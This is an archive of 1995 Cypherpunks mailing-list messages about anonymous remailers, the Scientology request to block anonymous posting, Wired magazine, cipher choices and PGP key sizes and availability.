$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 16 Jan 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
rahul    homer@rahul.net                  ***********#     3:32  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+#*****+#     8:27  99.86%
ideath   remailer@ideath.goldenbear.com   ---------+--  2:11:08  99.84%
penet    anon@anon.penet.fi               ************    35:48  99.99%
nately   remailer@nately.ucsd.edu         +++ -+-+++++  1:08:44  99.76%
mix      mixmaster@nately.ucsd.edu        -++ .++++++*  1:43:39  99.75%
q        q@c2.org                         ++---+++++-   1:16:03  99.74%
vox      remail@vox.xs4all.nl             --------- -   9:46:45  99.99%
soda     remailer@csua.berkeley.edu       .... ..-..-   8:32:46  99.41%
alumni   hal@alumni.caltech.edu           +**** -++-*#  1:52:49  99.20%
portal   hfinney@shell.portal.com         #*#** -##- *  1:23:04  99.17%
extropia remail@extropia.wimsey.com       ++++++++++++  3:15:35  97.19%
rebma    remailer@rebma.mn.org            _-_.---_..-* 21:48:17  90.00%
desert   remail@desert.xs4all.nl          ----.-_.--   22:09:02  86.57%
usura    usura@replay.com                 -+**+ +-  ++    33:32  84.49%
xs4all   remailer@xs4all.nl               -+**+++-  **    22:59  79.87%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Mon, 16 Jan 95 09:15:48 PST
To: cypherpunks@toad.com
Subject: Re: Scientology [!]
In-Reply-To: <9501161616.AA06028@elysion.iaks.ira.uka.de>
Message-ID: <SKg6laa0iQiG077yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 16 Jan, danisch@ira.uka.de (Hadmut Danisch) wrote:

> > FROM:  Lance Cottrell
> >        Operator of remailer@nately and mixmaster@nately
     [...--aw]
> >  I am willing to comply with your request.

> Oh. If this is true (is it?) and other remailer operators do the
> same, there will be no anonymous criticism of the Thetans any more.

I don't have the text of Lance's response available at the moment, but
I believe he clearly stated that he would not block remailings to the
mail-to-news gateways.  I.e., while he's complying with the letter of the
Co$ request, his remailers can still be used effectively for anonymous
posting.  Other than a slight delay in posting, I can't think of any
inconvenience this imposes on those wishing to post anonymously.

I thought it was an excellent response.  /* nudge, wink, etc. :-) */


Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxqooVRRFMq4NZY5AQGZzQP9HMVer1sD3dTnY/VUYz3CVTeCR+5ICfcR
kG60dHeP7s/qKBHTF1qTx1hUGExqnC6DOBnvkh6wjhohcfjyGrQiQtyyhRQX55NH
FUtR3gjJH0lLxB4Qr1RI3mempuXL4H5G/aQoqz1rxHN2lGUFx3YBD+2zmAqPqFIZ
KMgL0vx6kTc=
=j7er
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 16 Jan 95 10:27:25 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501161122.AA05896@snark.imsi.com>
Message-ID: <199501161819.KAA14478@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> Sorry. Everyone seems to be assuring me that I should know her and
> that she's a longtime friend of Eric's, but I must admit that I've
> no memory of anything she's done. I believe people who say she's the
> origin of the term "cypherpunk", but I must admit to still having no
> real knowledge of who this person is.
> 
> In any case, I apologize for my ignorance and will try be on less of a
> hair trigger in the future. However, following a long stream of Wired
> interviews of bizarrely marginal community members, I simply assumed
> this was Yet Another.

And I apologize to Perry for not being even more elliptic in my
questioning of his language. It's jus that Jude is pretty well known
out here, at least by the group that was at the early meetings, and
so....

One thing I've found is that the electronic age has made me more
careful about insulting specific people. The Kibo Effect, call it.
(Hi, Kibo!) 

General insults, or political statements, are of course kosher, but
making any kind of snide remarks about Joe Foobar, for example, will
often result in these comments being fed to the at person. (I recently
made some comments here on this list about a public Net person, whom I
do not believe is or was subscribed...a few days later I got a
note from this person objecting to my characterization of his views! I
am assuming someone forwarded the traffic to him.)

So, if I see a "marginal" person interviewed by "Wired," I am
circumspect about commenting on them...they might be on the list, they
might actually be doing something important, etc. (Like that unknown
guy "Andreeson," or somesuch...I don't have any idea what he's done,
and I never heard of him before last year, but all the hype-zines are
putting him on their covers, so he must be doing something interesting
:).) 

Anyway, many of the folks "Wired" and the other hype-zines interview
are indeed strange and marginal. To be expected. There are only so
many of the standard "talking heads" that can be interviewed (the
stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.).

Frankly, I'd rather see a story on "Zippies," about which I'd heard
nothing substantive before, than Yet Another Ted Nelson Story, about
which I've heard entirely too much over the past decade. (Not to
insult Ted--Hi, Ted!--but there are only so many ways to tell the
Xanadu story...time for new approaches.)

I know some folks in the crypto/PGP community who were quite miffed
that such "marginal" folks as Eric Hughes, John Gilmore, and I were
featured on the cover of "Wired" 1.2 two years ago...they naturally
saw themselves as being more worthy, as perhaps they were....such is
life. The "credit assignment problem" in evolution and genetic
programming remains a tough one.

Finally, "Wired" is still mixing stories about flakes with seminal
articles, such as the one on "FinCEN" a while back. That makes it
still worth looking at, at least to me.


--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Mon, 16 Jan 95 07:27:26 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501161526.KAA28093@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


> Litsen, you mentioned that you were getting
>the same problem with other remailers.  That was because you 
>were mailing through my remailer to them or from them, right?  I sure
>hope so.  I would hate to think my code effected others remailers! :)
 
>    Homer

Yah, I'm 99% sure that it what happenned. I'll be testing that today.
I've sent a few test messages to your remailer and everythnig came back just 
fine. The trouble with other remailers is that it can take as much as a full 
day before a message gets delivered.
I'll get back to you.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 15 Jan 95 15:56:47 PST
To: cypherpunks@toad.com
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com>
Message-ID: <9501161049.ZM27032@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 13, 10:23pm, Raph Levien wrote:
> Negative response was immediate. The perpetrators were asked to stop,
> but they refused to. One Norwegian hacker took it upon himself to
> track down and "cancel" the offending messages. Most people on the Net
> considered this to be entirely appropriate.

It would probably be more accurate to say that there was little condemnation
of this action, and quite a groundswell of support for the move.

> A number of other self-promoting hucksters have sensed an opportunity,
> and have performed similar spams. In response, the Net evolved a
> defense mechanism to counter these spams and minimize the damage. The
> person currently serving this role is known by the pseudonym
> "CancelMoose." Almost everyone on the Net supports this effort, and
> agrees that it improves the overall value of Usenet.

Ditto.

> In many countries (and even China is on the Net these days), writings
> critical of the government, such as exposure of human rights abuses,
> are illegal. The authors face imprisonment, torture and death. By
> posting anonymously to the Net, the information can be brought safely
> to the attention of the world.

Perhaps mention the Russian coup, where the net became a conduite for
information leaving Moscow.  I remember a colleague of mine announcing
incidents which had occured within Moscow hours before the news services
broadcast them, simply by getting emails from a colleague nearby,

						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 15 Jan 95 16:56:51 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <Pine.SV4.3.91.950115103408.725B-100000@xcalibur>
Message-ID: <9501161145.ZM27648@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 15, 10:35am, Jonathan Cooper wrote:
> > I wouldn't use BLOWFISH.

>    Why?

Well, I wasn't the original person who said that they wouldn't use it,
but I would agree.  It's too new.  It looks very good so far, but until it's
been through a lot more analysis than Blowfish has received so far, it is
too much of an unknown quantity.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 16 Jan 95 12:24:53 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <199501162024.MAA21177@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@netcom.com (Timothy C. May)
> General insults, or political statements, are of course kosher, but
> making any kind of snide remarks about Joe Foobar, for example, will
> often result in these comments being fed to the at person. (I recently
> made some comments here on this list about a public Net person, whom I
> do not believe is or was subscribed...a few days later I got a
> note from this person objecting to my characterization of his views! I
> am assuming someone forwarded the traffic to him.)

I felt the same way recently.  I had commented here about elec cash
prodigy Stefan Brands being among those not getting into the DigiCash demo,
it got cross-posted to www-buyinfo (which is read by DigiCash people) and
led to a big political stink that may have set back relations between
Brands and Chaum and therefore the prospects for high-quality digital
cash.  I really regretted my words as it was certainly not my intention
to stir up bad blood.  I still tend to think of this list as a relatively
private place to make comments "just among friends", unlike more public
venues which feed into a wider cross-section of views and where I try to
be much more circumspect.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 16 Jan 95 10:36:41 PST
Subject: REQUEST:  Privacy/Free Speech URLs
Message-ID: <Pine.ULT.3.91.950116123112.15935A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On the request of a few law-related professors and other faculty, I'm
trying to put together a web page that brings together resources from all
over the net that are related to issues of free speech, privacy, libel,
censorship, etc. 

If you have a few URLS with materials related to the above, I'd 
appreciate it if you could drop them in an emailee to me.  Basically, any 
URL that ends up pointing to issues of rights and rules on the net, and 
possibly related software (such as PGP and the like).

Thanks much :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxq8aTokqlyVGmCFAQGPXwP+LpyRgw+fuV4HXzt3ObGyu4ME8XsgBbRz
Z2yyhVsbeK9DnhJuYPRiaHGjOmO3rl+9qmjisxbmQA8YkmKIyIGB8ViP7RKLoUlg
vCUzr00AbQHc9SZKuuQCyOSHirDNZfc/3A92U1MsEXZl/gACoNxOq3+uSqyE9LWu
bQrXW4xbl+0=
=2H+w
-----END PGP SIGNATURE-----


____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=>     I am Pentium of Borg
   \/   Finger for PGP Public Key  <=>   you will be approximated





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 16 Jan 95 10:01:22 PST
To: cypherpunks@toad.com
Subject: Re: Scientology (fwd)
Message-ID: <199501161802.NAA17787@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is the copy that was sent to the remailer operators' list. Note that
the start of "FROM:" is corrupted, and there's some odd line breaking. I'm
guessing that's the reason the signature doesn't check (for me, either).

 -L. Futplex McCarthy

Forwarded message:
> From remailer-operators-owner@c2.org Sun Jan 15 15:08:56 1995
> To: Remailer-Operators@c2.org
> Message-Id: <ab3f26ae01021004e8c7@[137.110.24.249]>
> Date: Sun, 15 Jan 1995 11:56:48 -0800
> From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
> Subject: Re: Scientology
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>                                                          1/15/95=20
> 
> TO:    THOMAS M. SMALL
>        COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
>        PUBLICATIONS, INC.
> 
> =46ROM:  Lance Cottrell
>        Operator of remailer@nately and mixmaster@nately
> 
> In response to your email of January 3, 1995 requesting that I block=
>  anonymous posting to the Internet news groups alt.clearing.technology and a=
> lt.religion.scientology.
> 
> Although my remailers have always supported direct posting to news groups,=
>  this feature has never been advertised or supported. Since direct posting=
>  from my remailers is never used, I am willing to comply with your request.=
>  Posting to alt.clearing.technology and alt.religion.scientology has been bl=
> ocked.
> 
> By this action I do not admit to any wrongdoing on my part, nor do I wish to=
>  imply any wrongdoing on the part of any users of my remailers. I am merely=
>  turning of a feature that I never intended to be used.
> 
> By design it is not possible to prevent users from using my remailers to=
>  send a message to another computer to be posted. I can not, and will not,=
>  block mail to other remailers or to mail-to-news gateways.
> 
>                                 Yours,
>                                         Lance M. Cottrell
> 
> CC: Cypherpunks@toad.com, remailer-operators@c2.org,
>     alt.privacy.anon-server, alt.privacy,
>     alt.religion.scientology, alt.clearing.technology
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM
> Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3
> ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94
> EH/mStSfdJY=3D
> =3DUgN1
> -----END PGP SIGNATURE-----
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 16 Jan 95 13:21:10 PST
To: cypherpunks@toad.com
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <199501162121.NAA05239@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: aba@atlas.ex.ac.uk

   I have had a look at the exported version of Netscape's WWW browser
   which has support for secure transfer of info, and it says it uses RSA
   keys limited to 40

That's RSADSI's RC4 cipher, not the RSA public key cipher.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 16 Jan 95 11:04:29 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com>
Message-ID: <9501161903.AA07088@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> One thing I've found is that the electronic age has made me more
> careful about insulting specific people. The Kibo Effect, call it.
> (Hi, Kibo!) 

I wasn't insulting Jude (whoever she is; I don't know her and have no
reason to have an opinion on her); I was insulting "Wired".

> Frankly, I'd rather see a story on "Zippies," about which I'd heard
> nothing substantive before, than Yet Another Ted Nelson Story, about
> which I've heard entirely too much over the past decade.

On the other hand, "Wired" used to interview people who were fairly
unknown but important -- there are an endless supply of such
people. When was the last time you saw an interview with someone like
Rick Adams, for example? He's not necessarily the *most* important
person on the planet, but being the proprietor of a company that runs
a good fraction of the world's internet connectivity and just got
partially bought by Microsoft, he's pretty important in a lot of ways,
and I legitimately know little about him. How about an article on the
economics of cellphone fraud -- a multi-billion dollar industry
created by the NSA and its desire to stop encryption from being
used. Lots of cool stuff out there to report on -- no need to do
fashion-fluff.

> I know some folks in the crypto/PGP community who were quite miffed
> that such "marginal" folks as Eric Hughes, John Gilmore, and I were
> featured on the cover of "Wired" 1.2 two years ago...

Two years ago, the average article in "Wired" was worth reading --
informative, cutting edge, accurate, and about something
important. Today, the articles are more likely to be about weird
hangers on from the cultural fringes mumbling weird deconstructionist
ravings about obscure topics. I've found an average of only one decent
article per issue lately -- and I have no doubt they'll fix that soon.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Mon, 16 Jan 95 13:33:31 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110103ab4095d1582a@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think we're pretty well agreed that Dave's DataHaven can't ensure that
files are encrypted without looking inside them at some point. It's a
dilemma: Dave wants to be sure he can't read something, but the only way
he can be sure is by reading it.

But suppose that Dave's good friend Ender Trent decides to set up a new
service, Ender Trent's Trusted Encryption. It's a simple job: people send
files to Ender and he returns them encrypted and signed. Now, all Dave
needs do is check Ender's signature before accepting a file. At no point
does Dave ever decrypt or attempt to decrypt such a file.

Ender offers encryption in many different forms. In the simplest, Alice
sends the file to Ender, Ender generates a random key, encrypts the file,
and sends both back to Alice. Almost as simple, Ender uses the hash of
the original file as the key. Presumably, Alice already knows the hash
and so Ender doesn't send that back.

Alice could supply a public PGP (or other asymmetrical algorithm) key
with the file and Ender uses that. If Alice is a frequent customer and
likes this method, she might register the key with Ender.

Lastly, Alice might want to supply a symmetric key of her own. Because
Ender wants to protect people like Dave, he can either print a warning
that the key used for encryption might not be secure, or run a
password-cracking algorithm on it, or both. Because of the extra effort
and reduced security, Ender might not want to offer this, or charge an
arm and a leg for it. And Dave might not be willing to accept such
files, anyway.

How is it better to have Ender do all this rather than Dave? Essentially,
it splits the risk. Dave never sees the files, and therefore can't be
responsible for their contents. Nor could he make sense out of them, even
if he tried really, really hard. He could operate his data haven in all
but the most repressive parts of the world.

Ender's risk is slim to none. Were he to be held accountable for files he
encrypts, public notaries would likewise have to be held accountable for
everything they notarize. I don't see that as a problem.

Dave might wish to offer an encryption service, as Ender might want to
offer a data haven, but, if they're smart, they won't accept files that
they themselves encrypted.

Ender's encryption need not only be for data havens, of course. Nervous
remailer operators might want proof of encryption. Escrow services will
likely like Ender. And probably more.

If there is a demand for a trusted encryption service, I'll create one
after the second trumpet audition for the Oregon Symphony on the first of
the month.  That's the main reason I'm signing this--to hold myself to it.

b&

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEUAwUBLxrj5a7gd9aHWwWVAQH2Hgf0CF+0CIMWiK7d52Gaa8fPpMQy+qAYOBj+
MxJPZJpwxLEzmdT8n+dWjz2+0uPbIXXYa8yEM86UeV9++BzNM7WkOr5tezUuUrYa
aM+I4yWJEz/oUpURxi4tt1Jmxn4F0IGQENBweIw+lsgU/TyNweCerKoShLpP4zca
iZr1HtkK/7KdEi/wmADtfI6aUHytRyMXYvwKhKiy23eAFyNtZgAz4i77p2Kw6iM6
aTGsQQVjda6AYcVlIcLAJN8v+pQV+RGKA4FGACsxEGHDCQvFd3/WvCD4pupPm80E
9QLhQ2zLIjAkSmkO9flndXq6TOcCtMd3f6u/oGCx1EHKUTdP8nbg
=svFy
-----END PGP SIGNATURE-----

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 11:59:00 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com>
Message-ID: <199501162004.PAA21196@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501161145.ZM27648@wiley.sydney.sgi.com>,
Ian Farquhar <ianf@sydney.sgi.com> wrote:
>Well, I wasn't the original person who said that they wouldn't use it,
>but I would agree.  It's too new.  It looks very good so far, but until it's
>been through a lot more analysis than Blowfish has received so far, it is
>too much of an unknown quantity.

That's okay.  So's my GUCAPI code (suggestions of a better name are
quite welcome.  I'm considering changing the name to the Hastur Crypto
Toolkit, purely on aesthetics).

BTW, pointers to public domain code for each of these ciphers/hashes would
be reatly appreciated.  The crypto part of the library is really going to
just be a collection of what's already available from elsewhere; the
main work is in genericizing the IO and the key management functions and
in making life difficult for people who don't follow the interface
properly.  Other than that, the only other real work is getting a reasonably
portable source of random numbers working as a default random source.

I'll also be distributing an ITAR-friendly "bones" version with instructions
on how to add ciphers.  Are PRNGs like BBS covered by ITAR?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxqVvxNhgovrPB7dAQGStwP7B9+lX/2KVxs6Zq6u4TNENGFJ6aW4Sydq
7RgJJo5YzKpyQFvzRB1FYYLWKJNIaMbPXrm6mLPLXzj7dShWDngQh3m+K+VP3qU3
IEtNsovJuXqvxWYzA4uH4c1SCAV1DDkjlAjx/Ix884cXbRmEJjpnfiUCrItEf42B
Nz3cwcILX4o=
=M18o
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxrRGSoZzwIn1bdtAQGfUAF9F0XSAuKnH+jJopAz02NYJmvA271oGq+A
7YSny6PSNLLK5wncl6lnbM0Rr3eQ58cf
=8qA2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 12:10:32 PST
To: cypherpunks@toad.com
Subject: Re: Pgp where?
Message-ID: <199501162015.PAA21338@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <ab3c722e200210036071@[192.187.167.52]>,
Dave Del Torto <ddt@lsd.com> wrote:
>FYI, I keep the most recent version of Mike Johnson's excellent guide on
>where to find PGP in:
>
>  ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt

I also have an infobot on pgp-faq@hks.net.  Sending mail there will get
you a fast autoresponse with a reasonably recent version of the same
FAQ.

>Send email to <pgp-questions@lsd.com> if you have further questions.

And, I'll remind everyone that we need volunteers for the pgp-help mailing
list (Dave's on it).  It's important that we be able to identify what the
worst barriers to PGP use are and the best way to do that is to answer
folks' questions.  Send mail to pgp-help-request@hks.net to be added.

Thanks,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxqYhRNhgovrPB7dAQH+4AP/RsK7SdY+KVmxuEn3JU8INnK0XnAsi3et
jw5jtTfcFJmIKN0u1PmcFeeOwbrgqahzPvOpTJvXQHA73zi94XLGbAR5hrDRAD7N
Sfm/4h6lngQV2tzAephZg0J5aV3X6wcCrhd3h3sG01QeaT8YWBzmeRKTXBpAkpWw
Nf7opd5EXhM=
=t88d
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxrTxSoZzwIn1bdtAQGTzgGAlbPDZqyvoI+5nSZS8NaAnXL5iUXIVRip
bu3AM/mGFK/3Y0AsfKnhr4b3ZnZP1KXS
=4gk2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 16 Jan 95 13:42:58 PST
To: aba@atlas.ex.ac.uk
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <9501162142.AA17465@mostly-harmless.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I suspect that this is not an RSA keysize, but an RC4 keysize.  Does
it specify 40bit RSA keys?  Or does it say "40 bit cryptographic key"?
I suspect something closer to the latter, in which case I highly doubt
it is an RSA key.

A 40-bit RSA key can be broken in seconds.

a 40-digit RSA key will take a few days.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Mon, 16 Jan 95 14:52:49 PST
To: cypherpunks@toad.com
Subject: Longer than 1048 bit keys
Message-ID: <v01510103ab40a8df63bd@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm using MacPGP 2.6(ui) and noticed that the limit for a key size is the
1048 bit ("military grade" (right)). Is there anyway to circumvent this to
make larger, harder-to-break-type keys?
TIA,
- -J

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLxr4xEiLvmPjc4XdAQFVZgP/UsykAUkO18IFddV+QTOkEK4wwipljb/F
U1zkrh3IlUUHg82OVhS7tAtEn68d2NyNvbv5k+00CY+DYv9eSLgSbgTeMyyspFTf
ZmQtjQZu0Qe6NVWOVMXAFzfUDhmAAytfssvMHqSEMyxaHdyNNFoK9csSg39VchfF
s/VBsHv9sZ4=
=JQbl
-----END PGP SIGNATURE-----

                   (-:                     aka:                    :-)
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
(-:                                     PGP block.
:-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Mon, 16 Jan 95 14:00:17 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: REQUEST:  Privacy/Free Speech URLs
Message-ID: <199501162159.QAA09934@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>On the request of a few law-related professors and other faculty, I'm
>trying to put together a web page that brings together resources from all
>over the net that are related to issues of free speech, privacy, libel,
>censorship, etc. 
>
>If you have a few URLS with materials related to the above, I'd 
>appreciate it if you could drop them in an emailee to me.  Basically, any 
>URL that ends up pointing to issues of rights and rules on the net, and 
>possibly related software (such as PGP and the like).
>
>Thanks much :-)

Check out Vince Cate's Cryptorebel/Cypherpunk Page at: 
ftp://furmint.nectar.cs.cmu.edu/security/README.html
It has just about everything with links to other sites that have links to 
other sites that have links to.... it's a web thing. :-)


***********************************************
jml@wizard.synapse.net
PGP encrypted mail preferred.
I might disagree totally with what you say but I'll defend your right to say 
it to the death.

***********************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 16 Jan 95 08:17:53 PST
To: cypherpunks@toad.com
Subject: Re: Scientology [!]
Message-ID: <9501161616.AA06028@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> -----BEGIN PGP SIGNED MESSAGE-----
> 
>                                                          1/15/95 
> 
> TO:    THOMAS M. SMALL
>        COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
